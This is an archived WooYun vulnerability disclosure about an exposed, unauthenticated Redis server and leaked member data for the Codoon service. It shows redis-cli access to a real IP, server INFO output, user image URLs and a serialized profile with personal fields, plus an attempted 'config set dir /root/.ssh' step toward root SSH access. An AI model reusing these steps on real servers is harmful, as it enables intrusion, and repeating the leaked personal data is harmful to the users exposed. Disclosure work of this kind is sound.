乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-19: 细节已通知厂商并且等待厂商处理中 2015-12-22: 厂商已经确认,细节仅向厂商公开 2016-01-01: 细节向核心白帽子及相关领域专家公开 2016-01-11: 细节向普通白帽子公开 2016-01-21: 细节向实习白帽子公开 2016-02-04: 细节向公众公开
Redis匿名访问,并且对外开放~
# 1 redis 未授权访问redis-cli -h 211.78.245.48
redis_version:2.4.7redis_git_sha1:00000000redis_git_dirty:0arch_bits:64multiplexing_api:epollgcc_version:4.4.6multiplexing_api:epollgcc_version:4.4.6process_id:1041uptime_in_seconds:63210637uptime_in_days:731lru_clock:338689used_cpu_sys:84255.39used_cpu_user:33401.28used_cpu_sys_children:0.00used_cpu_user_children:0.00connected_clients:60connected_slaves:0client_longest_output_list:0client_biggest_input_buf:0blocked_clients:16used_memory:11248256used_memory_human:10.73Mused_memory_rss:427347968used_memory_peak:178719528used_memory_peak_human:170.44Mmem_fragmentation_ratio:37.99mem_allocator:jemalloc-2.2.5loading:0aof_enabled:0changes_since_last_save:2310025bgsave_in_progress:0last_save_time:1448283306bgrewriteaof_in_progress:0total_connections_received:5106809total_commands_processed:500165572expired_keys:1704644evicted_keys:0keyspace_hits:42944402keyspace_misses:19498151pubsub_channels:3pubsub_patterns:0latest_fork_usec:0vm_enabled:0role:masterdb0:keys=4,expires=0db1:keys=3385,expires=2db3:keys=9,expires=0db5:keys=2,expires=0db6:keys=10,expires=0db9:keys=976,expires=976db10:keys=69,expires=69db11:keys=3385,expires=1968db12:keys=8,expires=0db13:keys=4,expires=4
# 2 会员信息泄露 网站图片没有做防盗链,所以可以看到妹子
http://img3.codoon.com/portrait/0c4626a3-d0a3-411d-8351-4469a667d05c/2015-10-28T21:50:54http://img3.codoon.com/portrait/0c4626a3-d0a3-411d-8351-4469a667d05c/2015-10-28T21:50:54http://img3tw.codoon.com/gps119397e29e21481f8a0582c358a95f92http://img3tw.codoon.com/gpsa3bed04ac4674c88afe728f161bc6cdehttp://img3tw.codoon.com/gpscd3efffd8caa4ef090861e8f27a2f59bhttp://img3tw.codoon.com/gpsda6e429df95145369421e2c2ab26eaab
邮箱地址泄露:
ccopy_reg_reconstructorp1(cwww.useraccount.modelsUserProfilep2c__builtin__dictp3(dp4S'mobilenumber'p5VI1447404059357p6sS'domain'p7V~vrc9u51p8sS'certificatename'p9VsS'last_login'p10I0sS'realname'p11V sS'emailverified'p12I01sS'tmp_portrait'p13VsS'verify_code'p14V6855b4afe9e7428ba24f8643e7ee8401p15sS'birthday'p16(dp17S'y'I2015sS'm'I8sS'd'I1ssS'address'p18VsS'portrait'p19V sS'id'p20Vf195193f-4b2a-4b93-bb34-02530644260bp21sS'_updated'p22cdatetimedatetimep23(S'\x07\xdf\x0c\x12\x0e\x15\x18\x03#T'tRp24sS'fighting_level'p25I0sS'group_ids'p26VsS'is_newuser'p27I01sS'gender'p28V1sS'followings'p29I0sS'_auto_id'p30L8537LsS'certificateid'p31VsS'nick'p32Vsimlp33sS'descroption'p34VsS'followers'p35I0sS'location'p36V\u5317\u4eacp37sS'mobileverified'p38I00sS'hobby'p39V\u8dd1\u6b65p40sS'mobile_portraits'p41(lp42sS'email'p43[email protected]p44sS'certificateinfo'p45VsS'installed_apps'p46VCODOONSPORTS_ANDROIDp47stRp48
config set dir /root/.ssh(error) ERR Changing directory: Permission denied
危害等级:中
漏洞Rank:5
确认时间:2015-12-22 08:28
确认漏洞
暂无